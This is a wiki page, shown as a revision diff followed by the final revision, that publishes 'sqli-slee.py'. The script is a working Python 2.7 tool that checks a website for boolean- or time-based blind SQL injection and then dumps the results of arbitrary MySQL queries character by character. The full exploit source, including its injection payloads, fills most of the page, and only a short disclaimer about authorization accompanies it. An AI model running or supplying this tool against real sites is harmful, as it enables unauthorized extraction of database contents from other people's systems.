Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "SQL injection/mysqli-blindutils/sqli-slee.py"
From NetSec
(→Source) |
|||
(11 intermediate revisions by 4 users not shown) | |||
Line 1: | Line 1: | ||
− | {{info|<center>This script uses time and | + | {{info|<center>This [[python]] script uses time and [[boolean enumeration|boolean]] based blind [[SQL injection]] to obtain the desired information from [[MySQL]] [[database]]s.</center>}} |
+ | |||
+ | <font size="-2">Special thanks to [[User:Dilon|Dilon]] for this tool.</font> | ||
=Info= | =Info= | ||
+ | {{main|mysqli-blindutils}} | ||
The syntax of this script is: | The syntax of this script is: | ||
− | python | + | python sqli-slee.py -u [url] -i [injection] |
==Example== | ==Example== | ||
− | python | + | python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()" |
==Disclaimer== | ==Disclaimer== | ||
Line 12: | Line 15: | ||
=Source= | =Source= | ||
{{code|text= <source lang="python"> | {{code|text= <source lang="python"> | ||
− | #!/usr/bin/ | + | #!/usr/bin/python2.7 |
− | + | ||
− | import sys,re | + | import sys,re,urllib2,string,time |
from optparse import OptionParser | from optparse import OptionParser | ||
from urllib2 import Request,urlopen,URLError,HTTPError | from urllib2 import Request,urlopen,URLError,HTTPError | ||
− | + | ||
def request(URL): | def request(URL): | ||
− | + | user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } | |
− | + | req = urllib2.Request(URL, None, user_agent) | |
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
+ | try: | ||
+ | request = urllib2.urlopen(req) | ||
+ | |||
+ | except HTTPError, e: | ||
+ | print('[!] The server couldnt fulfill the request.') | ||
+ | print('[!] Error code: ' + str(e.code)) | ||
+ | sys.exit(1) | ||
+ | |||
+ | except URLError, e: | ||
+ | print('[!] We failed to reach a server.') | ||
+ | print('[!] Reason: ' + str(e.reason)) | ||
+ | sys.exit(1) | ||
+ | |||
+ | return len(request.read()) | ||
+ | |||
def value(URL): | def value(URL): | ||
− | + | target = 0 | |
− | + | end = 0 | |
− | + | next_maybe = 0 | |
− | + | floor = 0 | |
− | + | ceiling = 255 | |
− | + | maybe = int(ceiling)/2 | |
− | + | ||
− | + | while(end != 9): | |
− | + | if(is_what(URL, maybe, '>')): | |
− | + | floor = maybe | |
− | + | next_maybe = int(maybe + ((ceiling - floor)/2)) | |
− | + | ||
− | + | elif(is_what(URL, maybe, '<')): | |
− | + | ceiling = maybe | |
− | + | next_maybe = int(maybe - ((ceiling - floor)/2)) | |
− | + | ||
− | + | elif(is_what(URL, maybe, '=')): | |
− | + | return chr(maybe) | |
+ | |||
+ | maybe = next_maybe | ||
+ | end += 1 | ||
+ | return 'done' | ||
+ | |||
+ | def is_what(URL, maybe, op): | ||
+ | if(sqli_type == 'boolean'): | ||
+ | ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+')) | ||
+ | if(TrueResponse == ValueResponse): | ||
+ | return 1 | ||
+ | else: | ||
+ | return 0 | ||
+ | elif(sqli_type == 'time'): | ||
+ | start = time.time() | ||
+ | ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+') | ||
+ | elapsed_time = (time.time() - start) | ||
+ | if (elapsed_time > 2): | ||
+ | return 1 | ||
+ | else: | ||
+ | return 0 | ||
+ | |||
+ | def vuln_check(URL): | ||
+ | print('[+] Checking site...') | ||
− | + | global TrueResponse | |
− | + | TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+')) | |
− | + | FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+')) | |
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | if(TrueResponse != FalseResponse): | |
− | + | print('[+] Site seems to be vulnerable to boolean based blind SQL injection.') | |
− | + | return 'boolean' | |
− | + | else: | |
− | + | start = time.time() | |
− | + | SleepResponse = request(URL + '%20and%20sleep(5)--+') | |
− | + | elapsed_time = (time.time() - start) | |
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
+ | if(elapsed_time > 5): | ||
+ | print('[+] Site seems to be vulnerable to time based blind SQL injection.') | ||
+ | return 'time' | ||
+ | else: | ||
+ | print('[!] Seems like site isnt vulnerable to blind SQL injection.') | ||
+ | sys.exit(1) | ||
+ | |||
def main(): | def main(): | ||
− | + | print(''' | |
− | + | Auto BSQLi tool for MySQL | |
− | + | ''') | |
+ | |||
+ | usage = 'usage: %prog -u <target> -i <injection>' | ||
+ | parser = OptionParser(usage=usage) | ||
+ | parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"') | ||
+ | parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"') | ||
+ | |||
+ | (options, args) = parser.parse_args() | ||
+ | if(options.URL and options.INJECTION): | ||
+ | URL = options.URL | ||
+ | INJECTION = urllib2.quote(options.INJECTION.encode("utf8")) | ||
+ | else: | ||
+ | print('[!] Missing url or injection parameter.') | ||
+ | print('[!] Use --help.') | ||
+ | sys.exit(1) | ||
+ | |||
+ | global sqli_type | ||
+ | sqli_type = vuln_check(URL) | ||
+ | position = 1 | ||
+ | dump = '' | ||
+ | print('[+] Dumping data...') | ||
− | + | while(1): | |
− | + | if(sqli_type == 'boolean'): | |
− | + | letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))') | |
− | + | elif(sqli_type == 'time'): | |
− | + | letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))') | |
− | + | ||
− | + | if(letter == 'done'): | |
− | + | break | |
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | dump = dump + letter | |
− | + | position += 1 | |
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
+ | if(dump): | ||
+ | print('[+] Data: ' + dump) | ||
+ | else: | ||
+ | print('[!] No data dumped. Check your injection.') | ||
+ | |||
if __name__ == "__main__": | if __name__ == "__main__": | ||
main() | main() | ||
</source>}} | </source>}} |
Latest revision as of 02:57, 21 November 2012
Special thanks to Dilon for this tool.
Contents
Info
- Main article: mysqli-blindutils
The syntax of this script is:
python sqli-slee.py -u [url] -i [injection]
Example
python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"
Disclaimer
The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act. |
Source
#!/usr/bin/python2.7 import sys,re,urllib2,string,time from optparse import OptionParser from urllib2 import Request,urlopen,URLError,HTTPError def request(URL): user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } req = urllib2.Request(URL, None, user_agent) try: request = urllib2.urlopen(req) except HTTPError, e: print('[!] The server couldnt fulfill the request.') print('[!] Error code: ' + str(e.code)) sys.exit(1) except URLError, e: print('[!] We failed to reach a server.') print('[!] Reason: ' + str(e.reason)) sys.exit(1) return len(request.read()) def value(URL): target = 0 end = 0 next_maybe = 0 floor = 0 ceiling = 255 maybe = int(ceiling)/2 while(end != 9): if(is_what(URL, maybe, '>')): floor = maybe next_maybe = int(maybe + ((ceiling - floor)/2)) elif(is_what(URL, maybe, '<')): ceiling = maybe next_maybe = int(maybe - ((ceiling - floor)/2)) elif(is_what(URL, maybe, '=')): return chr(maybe) maybe = next_maybe end += 1 return 'done' def is_what(URL, maybe, op): if(sqli_type == 'boolean'): ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+')) if(TrueResponse == ValueResponse): return 1 else: return 0 elif(sqli_type == 'time'): start = time.time() ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+') elapsed_time = (time.time() - start) if (elapsed_time > 2): return 1 else: return 0 def vuln_check(URL): print('[+] Checking site...') global TrueResponse TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+')) FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+')) if(TrueResponse != FalseResponse): print('[+] Site seems to be vulnerable to boolean based blind SQL injection.') return 'boolean' else: start = time.time() SleepResponse = request(URL + '%20and%20sleep(5)--+') elapsed_time = (time.time() - start) if(elapsed_time > 5): print('[+] Site seems to be vulnerable to time based blind SQL injection.') return 'time' else: print('[!] Seems like site isnt vulnerable to blind SQL injection.') sys.exit(1) def main(): print(''' Auto BSQLi tool for MySQL ''') usage = 'usage: %prog -u <target> -i <injection>' parser = OptionParser(usage=usage) parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"') parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"') (options, args) = parser.parse_args() if(options.URL and options.INJECTION): URL = options.URL INJECTION = urllib2.quote(options.INJECTION.encode("utf8")) else: print('[!] Missing url or injection parameter.') print('[!] Use --help.') sys.exit(1) global sqli_type sqli_type = vuln_check(URL) position = 1 dump = '' print('[+] Dumping data...') while(1): if(sqli_type == 'boolean'): letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))') elif(sqli_type == 'time'): letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))') if(letter == 'done'): break dump = dump + letter position += 1 if(dump): print('[+] Data: ' + dump) else: print('[!] No data dumped. Check your injection.') if __name__ == "__main__": main() |